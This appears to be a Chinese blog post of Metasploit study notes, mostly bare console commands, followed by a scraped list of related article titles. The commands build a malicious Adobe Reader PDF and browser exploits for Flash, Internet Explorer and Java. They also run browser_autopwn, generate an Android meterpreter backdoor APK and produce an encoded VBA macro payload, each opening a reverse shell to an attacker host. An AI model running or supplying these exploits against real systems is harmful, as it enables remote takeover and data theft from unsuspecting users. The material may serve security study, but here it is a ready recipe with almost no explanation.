MSF学习笔记(9)
来源:互联网 发布:wps办公软件官方下载 编辑:程序博客网 时间:2024/06/06 07:19
利用adobe reader漏洞执行payload
构造pdf文件
msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcpmsf exploit(adobe_utilprintf) > set lhost 1.1.1.1msf exploit(adobe_utilprintf) > exploit
利用网址构造
msf > use exploit/windows/browser/adobe_utilprintf msf exploit(adobe_utilprintf) > set srvport 80msf exploit(adobe_utilprintf) > set payload windows/meterpreter/reverse_tcpmsf exploit(adobe_utilprintf) > set lhost 192.168.56.103msf exploit(adobe_utilprintf) > set lport 4445msf exploit(adobe_utilprintf) > set uripath /pdf
flash利用
msf > use exploit/multi/browser/adobe_flash_hacking_team_uaf msf > use exploit/multi/browser/adobe_flash_opaque_background_uaf
浏览器自动利用
msf > use auxiliary/server/browser_autopwnmsf auxiliary(browser_autopwn) > set srvport 80msf auxiliary(browser_autopwn) > set uripath /msf auxiliary(browser_autopwn) > run
IE浏览器漏洞
msf > use exploit/windows/browser/ms14_064_ole_code_execution
jre利用漏洞
msf > use exploit/multi/browser/java_jre17_driver_manager msf > use exploit/multi/browser/java_jre17_jmxbeanmsf > use exploit/multi/browser/java_jre17_reflection_types
android后门程序生成
msf > use payload/android/meterpreter/reverse_tcp msf payload(reverse_tcp) > set lhost 1.1.1.1msf payload(reverse_tcp) > generate -f a.apk -p android -t raw
宏代码生成
root@kali:~/Desktop# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=5555 -e x86/shikata_ga_nai -f vba-exe
阅读全文
0 0
- MSF学习笔记(9)
- msf 学习笔记(1)
- msf学习笔记(2)
- msf学习笔记(3)
- msf学习笔记(4)
- msf学习笔记(5)
- MSF学习笔记(6)
- MSF学习笔记(7)
- MSF学习笔记(8)
- MSF学习笔记(10)
- 微软MSF框架学习笔记(9)
- MSF笔记(一)
- MSF笔记(二)
- 微软MSF框架学习笔记(1)
- 微软MSF框架学习笔记(2)
- 微软MSF框架学习笔记(3)
- 微软MSF框架学习笔记(4)
- 微软MSF框架学习笔记(5)
- JSP的四个作用域
- 欢迎使用CSDN-markdown编辑器
- html之改变ol默认样式
- Android学习笔记之Content Provider
- 解压缩文件;gz
- MSF学习笔记(9)
- Meta 标签与搜索引擎优化
- 购物车的原理及实现.(仿京东实现原理)
- java责任链模式(过滤器)
- jqGrid 历史和现状(1)
- 假如让你来设计数据库中间件
- Wdatepicker日期控件
- 移动端滚动加载数据判断是否滚动到页面底部
- PYTHON面向对象编程指南笔记